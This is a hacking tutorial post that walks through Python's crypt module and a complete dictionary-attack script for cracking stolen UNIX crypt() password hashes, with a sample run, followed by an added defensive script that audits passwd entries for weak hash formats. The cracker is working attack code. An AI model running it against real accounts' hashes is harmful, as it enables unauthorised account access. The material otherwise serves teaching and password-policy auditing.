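Python Hacking in Practice: A UNIX Password Cracker
System used: Ubuntu 14.04 LTS
Python version: Python 2.7.10
The crypt library is built into Python. It is used on UNIX systems, where the crypt() function hashes a password. The hashed password computed by the UNIX crypt function is: crypt('egg', 'HX') = HX9LLTdc/jiDE.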
$ python
Python 2.7.6 (default, Jun 22 2015, 18:00:18)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> help('crypt')
Output:
Help on module crypt:

NAME
    crypt

FILE
    /usr/lib/python2.7/lib-dynload/crypt.i386-linux-gnu.so

MODULE DOCS
    http://docs.python.org/library/crypt

FUNCTIONS
    crypt(...)
        crypt(word, salt) -> string
        word will usually be a user's password. salt is a 2-character string
        which will be used to select one of 4096 variations of DES. The characters
        in salt must be either ".", "/", or an alphanumeric character. Returns
        the hashed password as a string, which will be composed of characters from
        the same alphabet as the salt.

(END)
Press q to exit.
Let's try the crypt() function:
>>> import crypt
>>> crypt.crypt("egg", "HX")
'HX9LLTdc/jiDE'
>>>
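Program design
The attacker runs through every word in a dictionary, hashes each one with the Unix crypt() function, and compares the result with the stolen password hash.
This is the dictionary attack method for cracking hashed passwords.
Writing the program
You can download the source code here: 1-4-2-passwdCrack.py
Source code walkthrough: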
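#!/usr/bin/python
# -*- coding: utf-8 -*-
# Python 2 script (print statements), matching the interpreter used above.
import crypt


def testPass(cryptPass):
    # Traditional crypt() output starts with its 2-character salt.
    salt = cryptPass[0:2]
    with open('dictionary.txt', 'r') as dictFile:
        for word in dictFile:
            word = word.rstrip('\r\n')
            # Hash the candidate word with the same salt and compare.
            cryptWord = crypt.crypt(word, salt)
            if cryptWord == cryptPass:
                print '[+] Found Password: ' + word + '\n'
                return
    print '[-] Password Not Found.\n'


def main():
    # Each line of passwords.txt has the form user:hash[:other fields]
    with open('passwords.txt') as passFile:
        for line in passFile:
            if ':' in line:
                user = line.split(':')[0]
                cryptPass = line.split(':')[1].strip()
                print '[*] Cracking Password For: ' + user
                testPass(cryptPass)


if __name__ == '__main__':
    main()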
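The 'passwords.txt' and 'dictionary.txt' files read by the code can be downloaded here.
Add execute permission (mode 777 also makes the script writable by every user; chmod u+x is enough to run it):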
sudo chmod 777 1-4-2-passwdCrack.py
Run the script:
$ ./1-4-2-passwdCrack.py
[*] Cracking Password For: victim
[+] Found Password: egg
[*] Cracking Password For: root
[-] Password Not Found.
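From the output we can see that I successfully cracked the victim user's password, but not root's. This shows that root must be using a password that is not a word in our dictionary (the 'dictionary.txt' file). No matter: we have now learned one cracking method (the dictionary attack), and we will learn more cracking methods later.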
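For the defender's side of this result, the added example below (not part of the original post) audits passwd/shadow-style lines and flags accounts whose hash is still in the 13-character, 2-character-salt crypt() format shown above, uses md5crypt, or has an empty password. It is written for Python 3; the names classify, audit and SAMPLE are hypothetical, the sample entries are constructed, and the "acceptable" policy is this example's assumption.

```python
import re

# Traditional DES crypt: 2-char salt + 11-char digest, all from ./0-9A-Za-z.
DES_CRYPT = re.compile(r'^[./0-9A-Za-z]{13}$')
# Modular crypt "$id$" prefixes -> (scheme, acceptable). The acceptable flag
# is this example's policy (an assumption), not something the post defines.
MCF_IDS = {'1': ('md5crypt', False), '2a': ('bcrypt', True),
           '2b': ('bcrypt', True), '2y': ('bcrypt', True),
           '5': ('sha256crypt', True), '6': ('sha512crypt', True),
           'y': ('yescrypt', True)}

def classify(field):
    """Return (scheme, acceptable) for the password field of one entry."""
    if field == '':
        return ('empty', False)        # no password required at all
    if field == 'x':
        return ('shadowed', True)      # real hash lives in /etc/shadow
    if field[0] in '!*':
        return ('locked', True)        # password login disabled
    if field.startswith('$'):
        return MCF_IDS.get(field.split('$')[1], ('unknown', False))
    if DES_CRYPT.match(field):
        return ('descrypt', False)     # the format cracked in this post
    return ('unknown', False)

def audit(lines):
    """Return [(user, scheme)] for entries that fail the policy above."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith('#') or ':' not in line:
            continue
        user, field = line.split(':')[:2]
        scheme, acceptable = classify(field)
        if not acceptable:
            findings.append((user, scheme))
    return findings

# Constructed sample entries; only the first hash comes from the post.
SAMPLE = [
    'victim:HX9LLTdc/jiDE:503:100:Sample User:/home/victim:/bin/sh',
    'root:$6$constructedsalt$' + 'A' * 86 + ':0:0:root:/root:/bin/bash',
    'daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin',
    'legacy:$1$abcdefgh$' + 'B' * 22 + ':1001:1001::/home/legacy:/bin/sh',
    'guest::1002:1002::/home/guest:/bin/sh',
]

if __name__ == '__main__':
    for user, scheme in audit(SAMPLE):
        print('[!] %s: %s' % (user, scheme))
```

Accounts reported as descrypt should have their passwords reset under a modern scheme, since the 2-character salt and DES-based digest are what make the dictionary comparison above so cheap.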